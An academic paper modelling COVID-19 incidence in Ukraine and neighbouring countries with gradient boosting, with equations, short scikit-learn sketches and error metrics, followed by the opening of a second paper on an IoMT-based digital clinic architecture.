Coronavirus infection (COVID-19) causes severe acute illness with the development of respiratory distress syndrome in some cases. Cases of COVID-19 infection have been reported in most countries of the world on all continents. Currently (May 2021), more than 174 million people have been infected in the world, and over 3.5 million deaths associated with the infectious disease have been registered [1]. The most affected regions are the USA, India, Brazil, France and some other countries on various continents. The disease caused by the new coronavirus has been named by WHO "COVID-19," a new acronym derived from Coronavirus Disease 2019. Mathematical modeling is an effective tool for studying the epidemic process of COVID-19. Morbidity models make it possible to predict its dynamics, as well as to identify the factors that have the greatest influence on the development of the epidemic
[2]. This allows decision-makers to implement evidence-based, effective anti-epidemic and control measures to contain the COVID-19 pandemic in specific areas. Modeling of epidemic processes has been known since the beginning of the 20th century with the approach of Kermack and McKendrick [3], who improved the Ross model for malaria modeling. They found specific population density thresholds for different states of infectivity, recovery, and mortality. This approach is called compartmental modeling and is still used in public health today. The study [4] considers the classical SIR model, with the states Susceptible, Infected, Recovered, to simulate the dynamics of COVID-19. Global stability is calculated using the Lyapunov function and local stability using the Jacobian matrix. Through modeling, the authors show that social distancing is the best way to control the spread of COVID-19. Article [5] is also devoted to applying the classical SIR model to simulate the dynamics of COVID-19 in Saudi Arabia. At the same time, the model considers a non-linear rate of removal of individuals from the model, which depends on the ratio of the number of hospital beds. Numerical modeling determines the impact of the hospital bed ratio and public awareness on disease control. However, the use of the model on actual data is difficult. Studies [6, 7] extend the classical SIR model with the state E (exposed). In [6], the authors solve a system of differential equations using the Runge-Kutta method of the fourth and fifth orders. The results show that quarantine and isolation of contact individuals can help to reduce the spread of COVID-19. In [7], the authors consider the effects of varying degrees of containment and uncertainties in reported incidence to predict the spread of COVID-19 in certain areas. However, despite the growing sophistication of compartmental models of COVID-19 dynamics, they have some disadvantages [8]. These include low accuracy, high complexity, low adaptability, and the inability to automatically take into account factors that change in the dynamics of the epidemic process when the virulence of the infection changes. Therefore, the most promising approach for modeling the dynamics of COVID-19 is machine learning. The aim of the study is to develop a machine learning model for the COVID-19 epidemic process based on the gradient boosting method.
2 Analysis of COVID-19 Epidemic Process

To verify the model, we have used data on the daily incidence of COVID-19 in Ukraine and neighboring countries: Belarus, Hungary, Moldova, Poland, Romania, the Russian Federation and Slovakia, obtained from the Johns Hopkins University Coronavirus Resource Center. The choice of such countries also makes it possible to assess the adequacy of the model, since they have different dynamics of the development of the COVID-19 pandemic and different anti-epidemic measures implemented at different times. In Ukraine, the coronavirus infection COVID-19 (a new type of pneumonia) was first diagnosed on March 3, 2020 in Chernivtsi. On March 13, the first death was recorded as a result of a coronavirus infection. As of May 2021, more than 2 million cases were confirmed in Ukraine, of which more than 50 thousand were fatal [9]. There is no exact
data on those infected with COVID-19 in the occupied territories. In occupied Crimea, according to Johns Hopkins University, as of May 2021 there were about 70 thousand cases and about 2 thousand deaths. There is no reliable information on the occupied regions of Donbass. When analyzing the incidence of COVID-19 in Ukraine, data on the occupied territories of the Donetsk and Luhansk regions and Crimea were not taken into account. The COVID-19 epidemic in Ukraine is characterized by territorial distribution. The government assigns the country's regions to one of four quarantine zones, depending on the dynamics of morbidity and hospital congestion: green, yellow, orange and red. As of January 2022, more than 4 million cases were registered in Ukraine, of which more than 100 thousand were fatal. The number of registered cases of coronavirus in Belarus as of May 2021 is more than 380 thousand, while the number of deaths continues to grow daily and exceeds 2.5 thousand for the entire period of the spread of the infection [10]. These data follow from reports of the press service of the Ministry of Health. However, the statistics on the incidence of coronavirus in Belarus are significantly underestimated. Since mid-April 2020, the Belarusian Ministry of Health has practically stopped contacting the media on the topic of coronavirus. According to the data provided by the country to the UN, in the second quarter of 2020 there were 3,000 more deaths than in the same period of 2019. As of January 2022, more than 740 thousand cases were registered in Belarus, of which more than 6 thousand were fatal. As of May 2021, Hungary had vaccinated more than half of its population, but it continues to be one of the worst in the world in terms of COVID-19 deaths per capita. Hungary has administered both doses of vaccine to 63.42% of its population, according to the European Centre for Disease Prevention and Control [11]. But Hungary's high vaccination rate, the result of a procurement strategy that includes doses from China and Russia in addition to those provided by the EU, has failed to slow the pandemic spike, which has led to the world's highest two-week per capita death rate, according to Johns Hopkins University. As of January 2022, more than 1.5 million cases were registered in Hungary, of which more than 40 thousand were fatal. The first case of COVID-19 in Moldova was diagnosed on March 7, 2020: a woman returning from Italy tested positive for the new coronavirus. As the number of infected people began to rise, on March 17, 2020 the parliament declared a state of emergency throughout Moldova for a period of 60 days. The first death from COVID-19 was recorded on March 18, 2020. On March 23, 2020, the total number of confirmed cases exceeded 100, and on April 7 this number exceeded 1,000 cases. By April 10, cases were confirmed in all regions of the country, including the Transnistrian region. On April 27, 2020, the total number of deaths exceeded 100 [12]. As of January 2022, more than 440 thousand cases were registered in Moldova, of which more than 10.5 thousand were fatal. From March 14, 2020, according to the order of the country's Minister of Health, Łukasz Szumowski, a state of epidemic threat was declared in Poland. The epidemic threat was in effect from March 14 to March 20, and from March 15 a cordon sanitaire was introduced on the borders of Poland, significantly limiting border traffic.
According to a decree of the Minister of Health, a state of epidemic has been in effect in Poland since March 20 [13]. By May 2021, there were over 2.5 million cases of
infection, of which almost 75 thousand people died. In connection with the development of the second wave of the epidemic, the government decided to create temporary hospitals for patients with COVID-19. The first hospital was opened on October 29, 2020 at the National Stadium in Warsaw, and over time at least one such facility has been built in each voivodeship. As of January 2022, almost 5 million cases were registered in Poland, of which more than 100 thousand were fatal. In Romania, initially only cases imported from Italy were confirmed, in people who came from that country or had contact with a person from that country. An important source of infection in Romania has been people arriving from abroad who did not isolate at home or lied about not having been in an area affected by COVID-19. Former Minister of Health Victor Costache said that of the 277 cases confirmed by March 19, 2020, more than 80% were imported cases, and the rest were contacts of imported cases [14]. As of January 2022, more than 2.2 million cases were registered in Romania, of which more than 60 thousand were fatal. According to the operational headquarters, the spring peak of COVID-19 incidence in Russia took place on May 11, when the number of infected people detected per day was 11,656. In the summer months there was a tangible decline in COVID-19 incidence in Russia. However, the recession was replaced by an increase in the fall, and the spring incidence rates were surpassed; in particular, on December 6, 2020, the number of infected persons detected per day exceeded 29 thousand. In addition, there are unofficial estimates of the number of people infected. In particular, according to the estimates of Sberbank specialists, obtained by modeling based on official data and testing statistics of its employees, the number of Russian residents who had recovered from COVID-19 by the end of 2020 would reach 16.6 million, or 11.3% of the population. The bank explains the 5–6-fold excess over the official data by cases of mild and asymptomatic course of the disease [15]. As of January 2022, more than 11.8 million cases were registered in Russia, of which more than 300 thousand were fatal, and the country ranks 6th in the world in terms of the number of cases. The first preventive measures in Slovakia were taken in February 2020, when the Central Crisis Headquarters first met at the Ministry of Health of the Slovak Republic. The first measures against the epidemic were taken on March 6, 2020, and a state of emergency was declared on March 12. Schools have been closed since March 16, 2020, and the state of emergency lasted until June 14, 2020. On October 1, 2020, the government again declared a state of emergency, which lasted 45 days until November 14, 2020. The government extended it three times, most recently on February 8, 2021, when it was to remain in effect for 40 days, until March 19. Schooling for the 2020/2021 school year was interrupted on 12 October 2020 and did not resume until the end of the 2020 calendar year [16]. As of January 2022, more than 1 million cases were registered in Slovakia, of which more than 17 thousand were fatal.
3 Gradient Boosting Model

Boosting is an ensemble-building technique in which predictors are built not independently but sequentially [17]. This technique exploits the idea that the next model will learn from the mistakes of the previous one. The training observations have an unequal likelihood
of appearing in subsequent models, and the ones with the greatest error appear more often. Predictors can be chosen from a wide variety of models, such as decision trees, regression, classifiers, etc. Since predictors learn from previous mistakes, it takes less time to get to the real answer. But the stopping criterion must be chosen with care, otherwise it can lead to overfitting. Gradient boosting is a popular boosting algorithm. It sequentially adds new models to the previous ones so that the errors made by the previous predictors are corrected. Gradient boosting attempts to train new models on the residual error of the past while moving toward the minimum of the loss function [18].

The gradient boosting algorithm consists of the following steps [19]:
1. the model is built from a collection of data;
2. this model makes predictions for the entire dataset;
3. errors are calculated from the predictions and true values;
4. a new model is built with the errors as target variables, striving to find the best split to minimize the errors;
5. the predictions made with this new model are combined with the predictions of the previous ones;
6. the errors are calculated again using these predicted values and the true values;
7. this process is repeated until the error function stops changing or until the maximum number of predictors is reached.

Let's construct a generalized gradient boosting model. Let some differentiable loss function L(y, z) be given. We construct a weighted sum of basic algorithms:

a_N(x) = \sum_{n=0}^{N} \gamma_n b_n(x).  (1)
Selection methods of b_0(x): the most popular class (for classification):

b_0(x) = \arg\max_{y} \sum_{i=1}^{l} [y_i = y];  (2)

the average answer (for regression):

b_0(x) = \frac{1}{l} \sum_{i=1}^{l} y_i.  (3)
Suppose we have constructed a composition a_{N-1}(x) from N − 1 algorithms, and we want to choose the next basic algorithm b_N(x) so as to reduce the error as much as possible:

\sum_{i=1}^{l} L(y_i, a_{N-1}(x_i) + \gamma_N b_N(x_i)) \to \min_{b_N, \gamma_N};  (4)

\sum_{i=1}^{l} L(y_i, a_{N-1}(x_i) + s_i) \to \min_{s_1, \ldots, s_l};  (5)

s_i = -\left. \frac{\partial L}{\partial z} \right|_{z = a_{N-1}(x_i)};  (6)

the vector of shifts s = (s_1, …, s_l) coincides with the antigradient:

s = \left( -\left. \frac{\partial L}{\partial z} \right|_{z = a_{N-1}(x_i)} \right)_{i=1}^{l} = -\nabla_z \left. \sum_{i=1}^{l} L(y_i, z_i) \right|_{z_i = a_{N-1}(x_i)};  (7)
b_N(x) = \arg\min_{b} \sum_{i=1}^{l} (b(x_i) - s_i)^2;  (8)

\gamma_N = \arg\min_{\gamma} \sum_{i=1}^{l} L(y_i, a_{N-1}(x_i) + \gamma b_N(x_i)).  (9)
If the basic algorithms are very simple, then they approximate the antigradient vector poorly; adding such a basic algorithm corresponds to a step along a direction that is very different from the direction of steepest descent. If the basic algorithms are complex, then they are able to fit the training set perfectly in a few boosting steps, which leads to overfitting due to the excessive complexity of the family of algorithms. Let's consider a special case of gradient boosting for a regression task with the quadratic loss:

\frac{1}{2} \sum_{i=1}^{l} (a(x_i) - y_i)^2 \to \min_a;  (10)

a_N(x) = \sum_{n=1}^{N} b_n(x);  (11)

b_1(x) = \arg\min_b \frac{1}{2} \sum_{i=1}^{l} (b(x_i) - y_i)^2;  (12)

s_i^{(1)} = y_i - b_1(x_i);  (13)

b_2(x) = \arg\min_b \frac{1}{2} \sum_{i=1}^{l} \left( b(x_i) - s_i^{(1)} \right)^2.  (14)

Each subsequent algorithm is likewise fitted to the residuals of the previous ones:

s_i^{(N)} = y_i - \sum_{n=1}^{N-1} b_n(x_i) = y_i - a_{N-1}(x_i);  (15)

b_N(x) = \arg\min_b \frac{1}{2} \sum_{i=1}^{l} \left( b(x_i) - s_i^{(N)} \right)^2.  (16)

The residuals can be found as the antigradient of the loss function:

s_i^{(N)} = y_i - a_{N-1}(x_i) = -\left. \frac{\partial}{\partial z} \frac{1}{2} (z - y_i)^2 \right|_{z = a_{N-1}(x_i)}.  (17)
Thus, the basic algorithm chosen is the one that reduces the composition error as much as possible; this property follows from its proximity to the antigradient of the functional on the training set.
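To make the recurrence of Eqs. (10)–(17) concrete, here is a minimal from-scratch sketch (an illustration, not the authors' implementation); the choice of shallow decision trees as base learners and all parameter values are assumptions:

```python
# Minimal sketch of gradient boosting for regression with quadratic loss:
# each base learner is fitted to the residuals of the current composition,
# mirroring Eqs. (15)-(16); summing the learners gives a_N(x), Eq. (11).
import numpy as np
from sklearn.tree import DecisionTreeRegressor

def fit_gradient_boosting(X, y, n_estimators=100, max_depth=3):
    learners = []
    prediction = np.zeros(len(y))          # a_0(x) = 0
    for _ in range(n_estimators):
        residuals = y - prediction         # s_i^(N) = y_i - a_{N-1}(x_i)
        tree = DecisionTreeRegressor(max_depth=max_depth)
        tree.fit(X, residuals)             # b_N from Eq. (16)
        learners.append(tree)
        prediction += tree.predict(X)      # a_N = a_{N-1} + b_N
    return learners

def boosting_predict(learners, X):
    return sum(tree.predict(X) for tree in learners)
```

In practice, each tree's contribution is usually damped by a learning-rate coefficient, which plays the role of the weight γ_N found in Eq. (9).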
4 Experiments and Results

The COVID-19 epidemic process model was verified against daily statistics on new cases in Ukraine, Belarus, Hungary, Moldova, Poland, Romania, the Russian Federation and Slovakia. We used data provided by the Public Health Center of Ukraine under the Ministry of Health of Ukraine for Ukrainian data, and data from the Johns Hopkins University Coronavirus Resource Center for countries neighboring Ukraine. The metrics for assessing the adequacy of the model were the mean absolute error (MAE) and the mean square error (MSE).
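The paper reports only the resulting MAE and MSE values, not the pipeline itself. A plausible minimal sketch of such an evaluation with scikit-learn, where the lag width, test-window size, and hyperparameters are assumptions, might look like this:

```python
# Hypothetical evaluation sketch: forecast daily COVID-19 incidence with
# gradient boosting over lagged values and score with MAE/MSE as reported.
import numpy as np
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.metrics import mean_absolute_error, mean_squared_error

def make_lagged(series, n_lags=14):
    """Turn a 1-D daily-incidence series into (X, y) with n_lags features."""
    X = np.array([series[i:i + n_lags] for i in range(len(series) - n_lags)])
    y = np.array(series[n_lags:])
    return X, y

def evaluate(series, n_lags=14, test_size=30):
    X, y = make_lagged(series, n_lags)
    X_train, y_train = X[:-test_size], y[:-test_size]   # chronological split
    X_test, y_test = X[-test_size:], y[-test_size:]     # most recent days
    model = GradientBoostingRegressor(n_estimators=200, max_depth=3)
    model.fit(X_train, y_train)
    pred = model.predict(X_test)
    return mean_absolute_error(y_test, pred), mean_squared_error(y_test, pred)
```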
Fig. 1. COVID-19 forecasting for Belarus
Forecast for Belarusian data is presented in Fig. 1. MAE is 463.82. MSE is 457,336.11. Forecast for Hungarian data is presented in Fig. 2. MAE is 545.109. MSE is 954,897.51.
Fig. 2. COVID-19 forecasting for Hungary
Forecast for Moldavian data is presented in Fig. 3. MAE is 275.75. MSE is 166,087.96. Forecast for Polish data is presented in Fig. 4. MAE is 2,151.16. MSE is 13,180,096.34. Forecast for Romanian data is presented in Fig. 5. MAE is 1,062.50. MSE is 2,633,408.14. Forecast for the Russian Federation data is presented in Fig. 6. MAE is 5,855.17. MSE is 75,234,523.83. Forecast for Slovakian data is presented in Fig. 7. MAE is 261.20. MSE is 232,483.32.
Fig. 3. COVID-19 forecasting for Moldova
Fig. 4. COVID-19 forecasting for Poland
Forecast for Ukrainian data is presented in Fig. 8. MAE is 2,223.71. MSE is 11,929,595.02.
5 Discussion

Since the beginning of the pandemic, many research groups have been working on studying the coronavirus. Three main approaches are used to predict the dynamics of COVID-19: compartmental models, multi-agent models, and machine learning [20]. Machine learning models show the highest prediction accuracy. At the same time, they can be divided into two types: based on neural networks and based on statistical methods. A limitation of models based on neural networks is their high computational complexity, which is not always acceptable in public health settings that lack the necessary computing capabilities.
Fig. 5. COVID-19 forecasting for Romania
Fig. 6. COVID-19 forecasting for Russian Federation
Especially relevant is the use of models based on statistical machine learning in emergencies where resources are limited. The use of such models is of critical importance in the context of Russia's war in Ukraine. Russia's wanton and bloody invasion of Ukraine resulted in substantial human casualties and contributed to the spread of COVID-19. Factors that contribute to the spread of COVID-19 in Ukraine during wartime include:

• Difficulty in identifying cases associated with the temporary occupation of territories and active hostilities.
• Difficulties in diagnosis associated with the reduction of medical facilities and the redistribution of resources for the needs of military and civilian victims.
• Problems with the registration of morbidity associated with problems in the transfer of information to the Public Health Center of the Ministry of Health of Ukraine.
Fig. 7. COVID-19 forecasting for Slovakia
Fig. 8. COVID-19 forecasting for Ukraine
• Non-compliance with anti-epidemic measures associated, on the one hand, with high population density in bomb shelters and during evacuation and, on the other hand, with the mental health burden of the war, which pushed the problem of the pandemic into the background.
• Failure of preventive policy associated with the disruption of routine vaccination.

Therefore, the COVID-19 dynamics model developed in this study on the basis of the gradient boosting method is an effective tool for prompt decision-making regarding the implementation of preventive measures in medical institutions. The disadvantage of the model is the impossibility of determining the factors influencing the development of morbidity; therefore, a promising area of research is the creation of a combined machine learning model using a multi-agent approach. Through the use of machine learning models, multi-agent models will increase the accuracy of
forecasting, while it will be possible to conduct experimental studies to evaluate the effectiveness of the implemented anti-epidemic measures.
6 Conclusions

Evaluation of the constructed machine learning model based on the gradient boosting method for predicting the incidence of COVID-19 has shown that it can be used in public health practice to implement anti-epidemic measures. Depending on the duration of the constructed forecast, it can be used by public health professionals to solve various problems: operational analysis of the effectiveness of implemented control measures, evaluation of the effectiveness of planned restrictive and preventive measures, and assessment of the amount of resources needed to provide patients with proper care (number of beds, oxygen supply, number of medical personnel, etc.). The use of simulation modeling makes it possible to take into account the factors influencing the dynamics of the epidemic process and to scientifically substantiate the need for anti-epidemic measures aimed at stopping the pandemic in certain areas. The forecasts for countries neighboring Ukraine allow us to develop an effective entry policy into the country, as well as to assess the risks associated with the dynamics of COVID-19 in the surrounding territories.

Acknowledgement. The study was funded by the Ministry of Education and Science of Ukraine in the framework of the research project 0121U109814 on the topic "Sociological and mathematical modeling of the effectiveness of managing social and epidemic processes to ensure the national security of Ukraine" [21].
References

1. Lu, X., Xing, Y., Wong, G.W.: COVID-19: lessons to date from China. Arch. Dis. Child. 105(12), 1146–1150 (2020). https://doi.org/10.1136/archdischild-2020-319261
2. Izonin, I., et al.: Predictive modeling based on small data in clinical medicine: RBF-based additive input-doubling method. Math. Biosci. Eng. 18(3), 2599–2613 (2021). https://doi.org/10.3934/mbe.2021132
3. Kermack, W.O., McKendrick, A.G.: A contribution to the mathematical theory of epidemics. Proc. R. Soc. A: Math. Phys. Eng. Sci. 115(772), 700–721 (1927). https://doi.org/10.1098/rspa.1927.0118
4. ud Din, R., Algehyne, E.A.: Mathematical analysis of COVID-19 by using SIR model with convex incidence rate. Results Phys. 23, 103970 (2021). https://doi.org/10.1016/j.rinp.2021.103970
5. Ajbar, A., Alqahtani, R.T., Boumaza, M.: Dynamics of an SIR-based COVID-19 model with linear incidence rate, nonlinear removal rate, and public awareness. Front. Phys. 9, 634251 (2021). https://doi.org/10.3389/fphy.2021.634251
6. Mwalili, S., Kimathi, M., Ojiambo, V., Gathungu, D., Mbogo, R.: SEIR model for COVID-19 dynamics incorporating the environment and social distancing. BMC Res. Notes 13, 352 (2020). https://doi.org/10.1186/s13104-020-05192-1
7. Lopez, L., Rodo, X.: A modified SEIR model to predict the COVID-19 outbreak in Spain and Italy: simulating control scenarios and multi-scale epidemics. Results Phys. 21, 103746 (2021). https://doi.org/10.1016/j.rinp.2020.103746
8. Moein, S., et al.: Inefficiency of SIR models in forecasting COVID-19 epidemic: a case study of Isfahan. Sci. Rep. 11, 4725 (2021). https://doi.org/10.1038/s41598-021-84055-6
9. Moroz, O., Stepashko, V.: Case study of the Ukraine Covid epidemy process using combinatorial-genetic method. In: 2020 IEEE 15th International Conference on Computer Sciences and Information Technologies, pp. 17–20 (2020). https://doi.org/10.1109/CSIT49958.2020.9322000
10. Karath, K.: Covid-19: how does Belarus have one of the lowest death rates in Europe? BMJ 370 (2020). https://doi.org/10.1136/bmj.m3543
11. Galvan, V., Quarleri, J.: An evaluation of the SARS-CoV-2 epidemic 16 days after the end of social confinement in Hungary. GeroScience 42(5), 1221–1223 (2020). https://doi.org/10.1007/s11357-020-00237-6
12. Mavragani, A.: Tracking COVID-19 in Europe: infodemiology approach. JMIR Public Health Surveill. 6(2), e18941 (2020). https://doi.org/10.2196/18941
13. Chmielik, E., et al.: COVID-19 autopsies: a case series from Poland. Pathobiology 88(1), 78–87 (2021). https://doi.org/10.1159/000512768
14. Dascalu, S.: The successes and failures of the initial COVID-19 pandemic response in Romania. Front. Public Health 8, 344 (2020). https://doi.org/10.3389/fpubh.2020.00344
15. Lancet, T.: Salient lessons from Russia's COVID-19 outbreak. The Lancet 395(10239), 1739 (2020). https://doi.org/10.1016/S0140-6736(20)31280-0
16. Holt, E.: COVID-19 lockdown of Roma settlements in Slovakia. Lancet Infect. Dis. 20(6), 659 (2020)
17. Nechyporenko, A.S., et al.: Comparative characteristics of the anatomical structure of the ostiomeatal complex obtained by 3D modeling. In: Proceedings of the 2020 IEEE International Conference on Problems of Infocommunications Science and Technology (PIC S and T 2020), pp. 407–411 (2021). https://doi.org/10.1109/PICST51311.2020.9468111
18. Davidich, N., et al.: Monitoring of urban freight flows distribution considering the human factor. Sustain. Cities Soc. 75, 103168 (2021). https://doi.org/10.1016/j.scs.2021.103168
19. Borysenko, V., Kondratenko, G., Sidenko, I., Kondratenko, Y.: Intelligent forecasting in multicriteria decision-making. In: CEUR Workshop Proceedings, vol. 2608, pp. 966–979 (2020)
20. Comito, C., Pizzuti, C.: Artificial intelligence for forecasting and diagnosing COVID-19 pandemic: a focused review. Artif. Intell. Med. 128, 102286 (2022). https://doi.org/10.1016/j.artmed.2022.102286
21. Boyko, D., et al.: The concept of decisions support system to mitigate the COVID-19 pandemic consequences based on social and epidemic process intelligent analysis. In: CEUR Workshop Proceedings, vol. 3003, pp. 55–64 (2021)
The Internet of Medical Things in the Patient-Centered Digital Clinic’s Ecosystem Inna Kryvenko(B) , Anatolii Hrynzovskyi, and Kyrylo Chalyy Bogomolets National Medical University, Kyiv, Ukraine [email protected]
Abstract. The article analyzes the prospects of introducing a patient-oriented digital clinic with IoMT support. The synthesis of data-generating personal medical components with AI, ML, DL, VR, AR and blockchain technologies in the environment of an IoMT-based digital clinic to improve the quality and availability of health care is described. The object of research is the processes of providing medical care to patients and the prospective medical services provided by updated outpatient clinics. It is determined that the introduction of a patient-oriented digital clinic with IoMT technology and voice virtual medical assistants has significant benefits for the functionality of outpatient clinics, contributes to the evolution of digital clinics, and opens new opportunities for the diagnosis, treatment and prevention of patients' diseases, so the demand for this component of the modern eHealth ecosystem is growing and will continue to grow. It is established that a strengthening and promising component of a modern digital clinic is the creation of voice virtual medical assistants for the patient with support for AI, ML, AR, VR. It is justified that the proposed solution expands the functionality of the digital clinic and makes it a powerful tool in the management and care of patient health.

Keywords: Internet of Medical Things (IoMT) · digital (virtual) clinic · data-generating medical components · Edge/Fog/Cloud Computing · eHealth · voice virtual medical assistant · Microsoft Cloud for Healthcare · virtual reality (VR) · augmented reality (AR) · artificial intelligence (AI) · machine learning (ML) · deep learning (DL) · blockchain
1 Introduction

Modern technological developments open up significant innovative opportunities to improve patient health care. The introduction of a new generation of information technology is completely changing the healthcare industry, making it more sophisticated, powerful, efficient and personalized. These technologies include the Internet of Medical Things (IoMT), Virtual and Augmented Reality (VR, AR), Machine and Deep Learning (ML, DL), Big Data analytics, Artificial Intelligence (AI), robotic medical systems, wearables, blockchain, etc. IoMT technology plays an important role in the digital transformation of the healthcare system. It allows a variety of medical devices with built-in
sensors, biomedical scanners to connect to the health information system via the Internet [1]. At the same time, IoMT devices are able to work together and to accumulate, quickly analyze and automatically process large arrays of medical data.

Problem Statement and Analysis of Existing Research

IoMT technologies have promising potential for building digital (virtual) clinics as an innovative component of the digital healthcare ecosystem. The introduction of a digital clinic with IoMT support is conducive to better and more comprehensive patient health care and could considerably benefit the functionality of outpatient clinics. We analyzed scientific publications for 2010–2022 in the specialized biomedical bibliographical databases PubMed, Trip and Medline, along with Google Scholar, and searched for evidence on the effective use of digital clinics by patients as a component of the digital ecosystem of health care facilities. The results showed that in most cases patients were offered a digital clinic that was, in fact, a regular telemedicine web application. This approach was limited to minimal functionality, providing the opportunity for online and offline telemedicine consultations, informing patients, and communicating with the health care facility. Despite the limited functionality, the results of meta-analyses, systematic reviews and randomized clinical trials confirm the presence of significant evidence to support the use of digital clinics in patient care [2–4]. We believe that building a new generation of patient-oriented digital clinics with substantial support of IoMT and modern technologies has considerable advantages. The proposed innovation will significantly improve the quality of medical services to patients and strengthen the capacity of digital clinics. In this study, our research was focused on the features of the development and implementation of a digital clinic with IoMT technology support. Our efforts were also focused on finding effective solutions to expand the functionality of a patient-oriented digital clinic. It is also important to identify the benefits of using this innovative service and its function in the eHealth ecosystem. This approach complements telemedicine counseling and improves remote home health care for patients whose ability to physically visit a health care facility is restricted. Much attention has been paid to the study of modern eHealth services. The analysis of scientific publications in PubMed, Trip, WoS, Scopus and IEEE for the 2020–2022 period shows a growing interest in the use of modern technologies in e-health. In their research, scientists are actively considering ways to use AI, ML and DL to improve patient health and provide better medical care, for example for cardiovascular [5], cancer [6], endocrinological [7] and nervous diseases [8], etc. Studies of clinical applications of VR and AR in the treatment and rehabilitation of patients are quite common [9]. Recently, a number of publications have been devoted to the Internet of Things and IoMT [1, 10–15]. These studies analyze various architectural solutions for IoMT deployment [16–21]. In addition, it is advisable to use blockchain to ensure reliable data protection [22–26]. Research on modern digital services for the prevention of infectious diseases is relevant [27], and the implementation of IoMT has been successful in this direction [28]. There is also growing interest in digital health in application to military, tactical and emergency medicine [29].
There are studies that suggest the use of chatbots, which mostly work on scripts [30]. However, this significantly limits their potential in health care [31].
Our research has primarily led to the intention of introducing a patient-centered digital clinic as a component of the eHealth ecosystem and implementing the Hospital at Home and Home Health projects. The original perspective of our research lies in the synthesis of modern technologies in the digital clinic environment, which provides enhanced solutions to improve patient health care. In addition, we identify ways to increase the functionality of the digital clinic and consider effective solutions for its implementation. Our research results show that there are currently almost no studies implementing a patient-centered digital clinic project with IoMT technology support. The purposes of the article are to analyze the prospects of implementing a patientoriented digital clinic with IoMT support, to characterize the synthesis of AI, ML, DL, VR, AR, Blockchain technologies in the environment of a digital clinic based on IoMT to improve patient health and provide quality care. The tasks of the article are: (1) to substantiate the prospects and feasibility of introducing a digital clinic for home health care with IoMT support and e-health modern technologies capability; (2) to explore IoMT-solutions application and features in development of the patient-oriented digital clinic with integration of data-generating medical components and modern technologies such as AI, ML, DL, AR, VR, Blockchain in the Edge/Fog/Cloud computing environment; (3) to analyze the Microsoft Cloud for Healthcare solution, integrated with Microsoft Azure IoT, Dynamics 365, Microsoft Power Platform, and Microsoft 365, to deploy a patient-centered digital clinic. Paper structure includes: (1) substantiation of the digital clinic architecture with IoMT support for home health care in the Edge/Fog/Cloud computing environment; (2) analysis of AI methods, including ML and DL, for data-generating medical components analytics in a digital clinic with IoMT support; (3) analysis of AR and VR advanced capabilities for health care in a digital clinic; (4) analysis of blockchain technology to ensure a high level of data privacy and security; (5) implementation of the Microsoft Cloud for Healthcare solution with integration of Microsoft Azure IoT, Dynamics 365 and other compatible Microsoft services for deployment of patient-oriented digital clinic; (6) results and conclusions.
2 Materials and Methods

IoMT refers to the Internet of Things (IoT) used for medical purposes, and it has its own characteristics and peculiarities within the framework of digital clinic design. Modern IoMT solutions are deployed at different levels of architecture and involve the use of different computational paradigms and methods of processing, analyzing and transmitting data. This is important to ensure a high level of performance, reliability and security of the IoMT network. The basic level of the IoMT architecture consists of data-generating medical components (medical devices, sensors, biosensors, etc.) and digital communication tools used in the process of monitoring the patient's health. These components are characterized by different sizes, shapes and levels of technological complexity depending on the task they have to perform in IoMT. The application of modern biosensors and IoMT sensors assumes direct contact of portable smart devices with the patient in order to monitor health and collect a variety of physiological data. The sensors transmit a considerable amount of patient
data via the IoMT network, which is then processed on a cloud server in real time. As a result of this design, there may be delays due to the transfer of data between cloud computing and the end user. To avoid this situation and to improve the IoMT network, there has recently been growing interest in architectures that implement collaboration between Cloud, Fog and Edge computing (Edge/Fog Health) [10]. The Edge computing level in the IoMT architecture assumes that some data processing takes place directly on the medical devices to which the sensors are connected, or on a gateway device that is physically close to the sensors [10]. Examples of Edge nodes are wearable devices such as smartphones, smart watches, exo- or endocomponents of compact digital medical devices, or portable special embedded and/or implanted systems. The combination of modern computational paradigms for distributing the processing and storage of medical sensor data is an effective solution: it eliminates possible local congestion and ensures high productivity and reliability of the virtual home health care clinic.

Fog computing nodes are the next step in data processing, after Edge calculations in IoMT medical devices, on the way to the cloud server. The Fog layer operates at the LAN level, which includes personal computers, local servers, and gateways that may be physically more remote from the medical sensors. It involves collecting data from medical sensor networks and peripheral Edge medical devices to perform data processing localized in the vicinity of the data-generating medical components. At the Cloud computing level, cloud services are used to perform high-performance computing tasks, analytics and remote storage. Among the well-known providers of cloud services with support for the Internet of Things are Microsoft Azure IoT Hub [32], Google Cloud IoT solutions [33], Amazon AWS IoT [34], IBM Watson™ IoT Platform [35] and others. IoMT cloud-platform solutions, in particular Microsoft Cloud for Healthcare [36], ThingSpeak for IoT Projects [37], IoT Solutions for Healthcare [38] and others, are widespread. The communication layer of the architectural components includes suitable connection means for data transmission and the data protocols used in IoMT environments.

Figure 1 represents the architecture of a digital clinic system with IoMT support for home health care, which consists of three levels: (1) a device level, where IoMT data-generating medical components collect patient information and perform preliminary computing at the Edge level; (2) the Fog level, at which patient information is analyzed according to the appropriate classification rules on a local server; (3) the Cloud layer, which performs data analysis and decision-making and coordinates the work of the patient-centered digital clinic's ecosystem and the general eHealth system. The next step in the productive operation of a patient-centered digital clinic is data analysis, which can be improved with the help of modern AI technologies. Common AI methods include ML and DL. For big data analytics in medicine, ML and DL are widely used for medical image processing, genomics that analyzes genome-wide data, and signal processing of data from IoMT and data-generating medical components. ML in IoMT provides a set of important operations on medical data related to classification, clustering, ranking, automation, forecasting, anomaly detection, and analysis of patterns.
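As one hedged illustration of the anomaly-detection operation mentioned above (the sensor values, thresholds and parameters below are synthetic assumptions, not from the paper), such a check could be performed on vital-sign readings as follows:

```python
# Illustrative sketch: flagging anomalous vital-sign readings collected by
# IoMT sensors with an Isolation Forest trained on typical values.
import numpy as np
from sklearn.ensemble import IsolationForest

# Synthetic stream of (heart_rate, SpO2, body_temperature) readings.
rng = np.random.default_rng(0)
normal = np.column_stack([rng.normal(72, 6, 500),     # heart rate, bpm
                          rng.normal(97, 1, 500),     # SpO2, %
                          rng.normal(36.6, 0.3, 500)])  # temperature, C
detector = IsolationForest(contamination=0.01, random_state=0).fit(normal)

new_readings = np.array([[70, 97, 36.5],    # typical reading
                         [140, 88, 39.2]])  # suspicious reading
print(detector.predict(new_readings))       # 1 = normal, -1 = anomaly
```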
Fig. 1. Three-level distributed digital clinic architecture with IoMT support for home patient health care in Edge/Fog/Cloud computing

